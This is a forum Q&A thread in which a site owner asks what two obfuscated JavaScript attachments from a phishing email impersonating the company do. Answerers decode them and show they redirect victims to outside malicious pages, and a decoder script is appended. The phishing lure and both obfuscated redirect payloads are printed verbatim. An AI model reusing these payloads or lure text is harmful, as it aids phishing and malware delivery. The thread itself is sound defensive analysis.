views:

257

answers:

5

I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:

Dear Customer,

This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.

(C) ourwebsite.com (I changed that)

The attached file is an HTML file that has the following javascript:

<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

Another email had this:

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

Can anyone tell me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ...

Thanks

+5  A: 

Answer:

The script executes

document.location.href = "http://mvblaw.com/z.htm";    //Evil site (I assume)

It also contains a large number of useless lines to hide the script's true purpose.

Analysis

Here it is unpacked.

function mD() {};
this.aB = 43719;
mD.prototype = {
    i: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';

Cleaning up the obfuscations and adding meaningful names, it becomes

function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
    doIt: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['location'];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['href'] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';

Removing all of the useless lines, it becomes

function TempClass() {};

TempClass.prototype = {
    doIt: function () {
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var f = document;
        var iD = f['location'];
        iD['href'] = a;
    }
};

var b = new TempClass();
b.doIt();
SLaks
http:// mvblaw . com/z.htm after regexp. All it seems to do is redirect to that address.
Glenn
The link is now down (standard Apache 404); you don't need to worry about it.
SLaks
So you don't think this targets specifically our website then? It's just a generic email and they use our name?
nute
Is this better?
Glenn
SLaks, the link for the second script is live. And it looks bad.
nute
It's trying to redirect the user to http://mvblaw.com/z.htm. In line 8, that string looks like a bunch of gibberish, but the replace method that follows strips out the characters in the regular expressions, leaving http://mvblaw.com/z.htm. They do the same thing later to set the location.href value of the browser window, redirecting the user to that z.htm page that probably had malware or something else evil happening on it.
wmid
Glenn - if you mean, is it better that it's just a random email, yes: I was afraid it was a script designed to make our users do things on our website, that would then lead to the script affecting other people visiting our site ...
nute
@nute: The second link redirects to a different site, which sends no content.
SLaks
well, you can `view-source:http://mvblaw.com/z.htm` in Google Chrome to see what code is inside...
Reigel
+3  A: 

No geniuses, they:

'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');

h t t p : / / m v b l a w . c o m / z . h t m


f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];

   l o c a t i o n

iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;

    h r e f

Didn't even need to run it through regex :)

I'm going to assume they hacked mvblaw and snuck the payload page on there. Anyone with a VM want to see what it does?

egrunin
it seems the second script sends to lendermedia . com/images/z.htm, which is a Canadian pharmacy, and it tried to load some Java code too.
nute
A: 

It may be related to this StackOverflow question

If you Google the script in question, don't follow the links, they triggered my anti-virus

LittleBobbyTables
Yes, that's the same one. Great nym, btw :)
egrunin
yeah! great name!... :D
Reigel
A: 

Basically, it appears to set (document['location'])['href'] (or, in regular speak, document.location.href) to http://mvblaw.com/z.htm.

The obfuscation code is pretty simple, just replacing the noise characters with nothing:

var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
    // a = http://mvblaw.com/z.htm
var f=document;
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
    // iD = document.location
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
    // document.location.href = a (the URL above).
paxdiablo
+3  A: 

The script has a lot of useless stuff just to create confusion, the essential parts of the script are:

function mD() {};
mD.prototype = {
  i: function () {
     // read between every two letters:
     var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
              .replace(/[gJG,\<]/g, '');
     var f = document;
     var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
     iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
   }
};
var b = new mD();
b.i();

If we clean up more:

function mD() {};
mD.prototype = {
  i: function () {
     var a = 'http://mvblaw.com/z.htm';
     var f = document;
     var iD = f['location'];
     iD['href'] = a;
   }
};
var b = new mD();
b.i();

And more:

function mD() {};
mD.prototype = {
  i: function () {
     document.location.href = 'http://mvblaw.com/z.htm';
   }
};
var b = new mD();
b.i();
CMS
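A static decoder for the replace-based obfuscation that the answers above (SLaks, paxdiablo, CMS) work out by hand, as an added example that is not part of any answer on this page: it pulls every 'literal'.replace(/[noise]/g, '') expression out of both scripts quoted in the question and applies the same character deletion, so the redirect target can be read without opening the attachment in a browser. The function names and the matching regex are my own; the two script bodies are copied from the question.

```javascript
// Added example, not code from the question or the answers: a static decoder for
// the "'noisy literal'.replace(/[noise]/g, '')" trick used by both attachments.
// SCRIPT_1 / SCRIPT_2 are the two <script> elements quoted in the question, kept
// as raw strings so the regex escapes inside them (\<, \], \^, \!, \.) survive.
const SCRIPT_1 = String.raw`<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>`;
const SCRIPT_2 = String.raw`<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>`;

// Matches  'literal'.replace(/[class]/g, '')  and captures the literal (group 1)
// and the character class (group 2). The class may contain escaped characters
// such as \] or \<, so it is read as "escape pair or any non-] character".
// Tailored to the single-quoted form these two samples use.
const NOISE_REPLACE = /'([^'\\]*)'\.replace\(\/\[((?:\\.|[^\]\\])*)\]\/g,\s*''\)/g;

// Every obfuscated literal in source order, with the value the script itself
// would compute: delete the noise class from the literal, exactly as .replace does.
function recoverStrings(script) {
  const found = [];
  for (const m of script.matchAll(NOISE_REPLACE)) {
    const noise = new RegExp('[' + m[2] + ']', 'g');
    found.push({ obfuscated: m[1], noiseClass: m[2], decoded: m[1].replace(noise, '') });
  }
  return found;
}

// Only the decoded values that are URLs: where a victim's browser would be sent.
function redirectTargets(script) {
  return recoverStrings(script)
    .map((s) => s.decoded)
    .filter((v) => /^https?:\/\//i.test(v));
}

// Report what each attachment resolves to (URL, then the property chain it sets).
for (const [name, script] of [['first attachment', SCRIPT_1], ['second attachment', SCRIPT_2]]) {
  console.log(name, recoverStrings(script).map((s) => s.decoded), 'targets:', redirectTargets(script));
}
```

The decoded sequence URL, location, href is the `document.location.href = URL` assignment the answers describe; the same decoder can be pointed at a whole mailbox export to list every redirect target without rendering anything.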